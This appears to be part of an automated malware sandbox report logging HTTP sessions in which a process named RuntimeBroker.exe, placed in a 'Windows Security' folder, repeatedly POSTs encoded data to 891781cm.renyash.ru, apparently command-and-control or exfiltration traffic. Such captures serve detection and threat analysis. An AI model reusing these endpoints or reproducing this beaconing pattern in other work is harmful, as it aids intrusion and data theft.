                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          48192.168.2.449789104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:41.711786985 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:42.068814993 CET1056OUTData Raw: 55 52 5d 53 5a 58 51 54 55 5a 54 59 51 5d 55 5d 58 5d 5c 59 59 50 52 5a 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UR]SZXQTUZTYQ]U]X]\YYPRZ][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#?%!+%2%])>[37--(\%<>Q0Z#_8=;+$U*,#^!'^)?
                                                                                                                          Jan 1, 2025 04:22:42.156637907 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:42.354821920 CET807INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:42 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b1%2B0ZGpYBE0GCDcA2Gmz2zp4KuAMDfmP21YyalNY8OEZySwmPemfQGqptnU9hB%2BTRXkl%2FHM9TTwSFIeGuCQm%2BnOmeOFcnhedrpwe82GRD3OG2AznZTmkduwlHfEeyAhivbUYLNNC"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62ed3ee0420b-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2273&min_rtt=1765&rtt_var=1679&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=250171&cwnd=135&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          49192.168.2.449790104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:42.476875067 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:42.834418058 CET1056OUTData Raw: 50 51 58 52 5a 5a 54 5f 55 5a 54 59 51 58 55 5d 58 5a 5c 55 59 50 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PQXRZZT_UZTYQXU]XZ\UYPRX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ +Y6712=9[>'$'"Q9$+'&/<->'?>)#^!'^)+
                                                                                                                          Jan 1, 2025 04:22:42.925000906 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:43.193171024 CET811INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:43 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3OaVB9YWu5IKGzycjWPf3wBuSWmUsoUoS0PHD5vaB858H0OJ6IezbAl2MX08BBwTRUV2vl%2FiVActi0cT0q%2FY7GUGCsO6rZK%2Fm9M%2Few%2F9FNCMnzwDrmqwH4DL8vZ8ENDbkFVqp%2FQh"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62f20db143b6-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1898&min_rtt=1631&rtt_var=1147&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=387062&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          50192.168.2.449791104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:42.480591059 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1780
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:42.834417105 CET1780OUTData Raw: 55 56 5d 57 5a 5f 51 58 55 5a 54 59 51 58 55 5c 58 5e 5c 58 59 51 52 5a 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UV]WZ_QXUZTYQXU\X^\XYQRZ][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#)?!+$>X>>3_'':U-'<^3!$#Y,=$<=<W)#^!'^)+
                                                                                                                          Jan 1, 2025 04:22:42.932794094 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:43.190776110 CET957INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:43 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oVdxPSp2jz8NrUmhAOe8tiDsFHeD7w3tu%2BkB1lXU4BzNM1BUw%2FGV0BJx%2FJ7YjWOO4UtNLJVzWFdKnPp2HqU2y%2FYXUtKxVDoTzU4ttbZkUdvoCKVIrM4DhbLuX0QC%2FS1cKwMOQOcu"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62f20bb6de9b-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3842&min_rtt=1481&rtt_var=5278&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2124&delivery_rate=71666&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 39 38 0d 0a 03 1e 21 0f 26 2b 2b 14 2b 10 2e 58 38 2f 01 1d 32 01 3e 15 30 33 2c 13 25 3e 29 1b 2d 28 23 02 3f 3b 23 10 25 39 31 59 34 21 00 59 31 0c 2e 5d 04 1d 26 00 2a 29 21 07 2b 11 31 58 29 21 3c 5d 30 19 3c 04 31 27 20 58 24 2d 32 5c 36 32 3c 0d 27 55 24 56 3f 29 06 01 33 3d 3e 54 21 3a 2e 57 0d 12 22 57 26 10 17 52 2a 0f 23 0b 36 02 33 55 33 11 24 0f 33 3c 24 54 23 16 03 0f 3e 3f 24 11 22 34 22 0e 30 39 27 5b 21 07 21 1e 21 23 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 98!&+++.X8/2>03,%>)-(#?;#%91Y4!Y1.]&*)!+1X)!<]0<1' X$-2\62<'U$V?)3=>T!:.W"W&R*#63U3$3<$T#>?$"4"09'[!!!#"T /T=VO0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          51192.168.2.449792104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:43.320871115 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Jan 1, 2025 04:22:43.678014040 CET1056OUTData Raw: 50 51 58 53 5a 57 51 58 55 5a 54 59 51 59 55 54 58 5a 5c 5c 59 55 52 58 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PQXSZWQXUZTYQYUTXZ\\YURX][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#??27]=$-=\(>0'71.7+$/3,8>;<4R(,#^!'^)/
                                                                                                                          Jan 1, 2025 04:22:43.765563965 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:44.035346031 CET811INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:43 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j%2BjmHUMGHtEtOJzgre9Cb81Ep7vTqTtk6%2BDUBh%2B2GPqcwcQiZN%2FLzc%2B9DegSJm%2Btjo3FqJjCc73W0Uw9x5cGoCYB0eKA9P7hYcmWt1SVPolJNlTCwrEeFGbTyJYDalPraLyRXEHt"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62f74bd38cab-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2519&min_rtt=1991&rtt_var=1803&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1376&delivery_rate=234839&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          52192.168.2.449793104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:44.174256086 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:44.521789074 CET1056OUTData Raw: 50 54 58 55 5a 5c 51 55 55 5a 54 59 51 5c 55 5c 58 5e 5c 59 59 56 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: PTXUZ\QUUZTYQ\U\X^\YYVR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ ]),>#+19)=/[3"Q97?'/T0Z8-. +X7=#^!'^)
                                                                                                                          Jan 1, 2025 04:22:44.627803087 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:44.814193010 CET801INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:44 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z3nLGf5RDLd1ChtLlRZe5e1hiXXxRyzOXps23UNvqleiMPTL5LmYWI7Vm5CCA8wbE0V52YU5bP2gBmeDs5qiRAyRax80qTQ8Rw96%2F5yRMx4HwyTCPQXRnV1xBbSuOFby7lFWOtrQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf62fcae44432b-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3715&min_rtt=2302&rtt_var=3690&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=107274&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          53192.168.2.449794104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:44.947731018 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:45.326267958 CET1056OUTData Raw: 55 50 58 5d 5f 5b 54 5a 55 5a 54 59 51 58 55 50 58 5d 5c 5e 59 56 52 53 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UPX]_[TZUZTYQXUPX]\^YVRS][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ#<!7;-1>*=7_3'&- $?$#,7<8>#^!'^)+
                                                                                                                          Jan 1, 2025 04:22:45.395667076 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:45.611814022 CET811INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:45 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l0nA%2FZVCRmhHWTTCt%2BPXqVHY1PjRjeE8mVNsq4LcNI%2B26PxgKRZbfkpK%2F3g1%2BrNpR1TtbAP6NUREnGScimUCbuf2t5FO0HRqoANhMTfwT9NNOn%2FxepZrDkgBZSOPYCQtEm1NR70M"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf630168d9238e-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3391&min_rtt=2125&rtt_var=3329&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=119154&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          54192.168.2.449795104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:45.869968891 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:46.225135088 CET1056OUTData Raw: 55 56 58 50 5f 5a 51 5c 55 5a 54 59 51 5e 55 53 58 59 5c 5f 59 55 52 5e 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UVXP_ZQ\UZTYQ^USXY\_YUR^][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ +<54+%_&==/['$.U-'$Y'Y=0<;(+X'=#^!'^)3
                                                                                                                          Jan 1, 2025 04:22:46.343324900 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:46.527405977 CET806INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:46 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TsFBFyhi5OhVonPxpMdSY%2FEWXTRI47LWDxvlHg%2Fvw6p78eW9CnFJlmRBHpu3UWYpWQ5%2F1pxk6tXhKQUiafCIoJIROb7YUvvKwKCihn5ktSaalJ%2Fi9faxPdajLiSBuNXf2SFa95ut"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63075c8a7cb1-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4427&min_rtt=2074&rtt_var=5484&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=69859&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          55192.168.2.449796104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:46.649450064 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:47.006088018 CET1056OUTData Raw: 55 57 5d 56 5a 5f 54 5a 55 5a 54 59 51 58 55 55 58 53 5c 59 59 57 52 53 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UW]VZ_TZUZTYQXUUXS\YYWRS][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ \?Z4"$=)).3$B:P.$$X'-'0->[<.+)#^!'^)+
                                                                                                                          Jan 1, 2025 04:22:47.093760014 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:47.359278917 CET805INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:47 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PsZGxubM7%2Fs0es03QKlDbHzHMZnSg%2BcNux7kVRg%2BXNctpU64S92rg4HmzgxP8ZdoWxvlAJ7MSxweP9hxdGpjX6bUpRPwLrnjMEWDOJdus74VAfdSBzshOKSzcM7xHVhKEfbelCBI"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf630c1a1778ed-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2437&min_rtt=1910&rtt_var=1771&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1400&delivery_rate=238095&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 41V[X0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          56192.168.2.449797104.21.38.84808128C:\Program Files\Windows Security\RuntimeBroker.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 1, 2025 04:22:47.511791945 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                          Host: 891781cm.renyash.ru
                                                                                                                          Content-Length: 1056
                                                                                                                          Expect: 100-continue
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 1, 2025 04:22:47.866169930 CET1056OUTData Raw: 55 50 5d 56 5f 5e 54 5a 55 5a 54 59 51 58 55 51 58 58 5c 5a 59 53 52 5b 5d 5b 46 5d 56 5d 56 51 42 5a 55 53 5d 5f 52 5a 58 54 51 59 5d 54 51 5a 52 51 5f 58 43 5b 54 59 53 5a 56 5b 54 53 53 59 5f 52 5d 5e 58 45 5a 51 5a 5c 58 5f 5c 53 59 51 59 52
                                                                                                                          Data Ascii: UP]V_^TZUZTYQXUQXX\ZYSR[][F]V]VQBZUS]_RZXTQY]TQZRQ_XC[TYSZV[TSSY_R]^XEZQZ\X_\SYQYRZVVX\Y__XTX\QP[SX]X[FTTQ^^YZ\S\_PW_]Z]XXQQW[ZXZQ_VY^\X\X[Q_BXVZ[VTUVUAC]Y]V^YQFP_B\XTSPCU^V_TQF[Z]ZYSZ \?Y-\ $>&)>$$'"97<_'2W3+,>==')#^!'^)+
                                                                                                                          Jan 1, 2025 04:22:47.956862926 CET25INHTTP/1.1 100 Continue
                                                                                                                          Jan 1, 2025 04:22:48.292324066 CET813INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 01 Jan 2025 03:22:48 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2krfIbDAYRrO4EQJ0MifcwvpH%2FAW%2Be3EdDPqq30sHwFjeEy%2B3kbj%2FyW7MkykIH9A%2B8K9fb58%2FHp%2Flr3GW18iETVhp7w7aDh5G6qbu367OLNWqGqIMJ9O35pvnT4aAGvhknT218qd"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8faf63117a0172ad-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
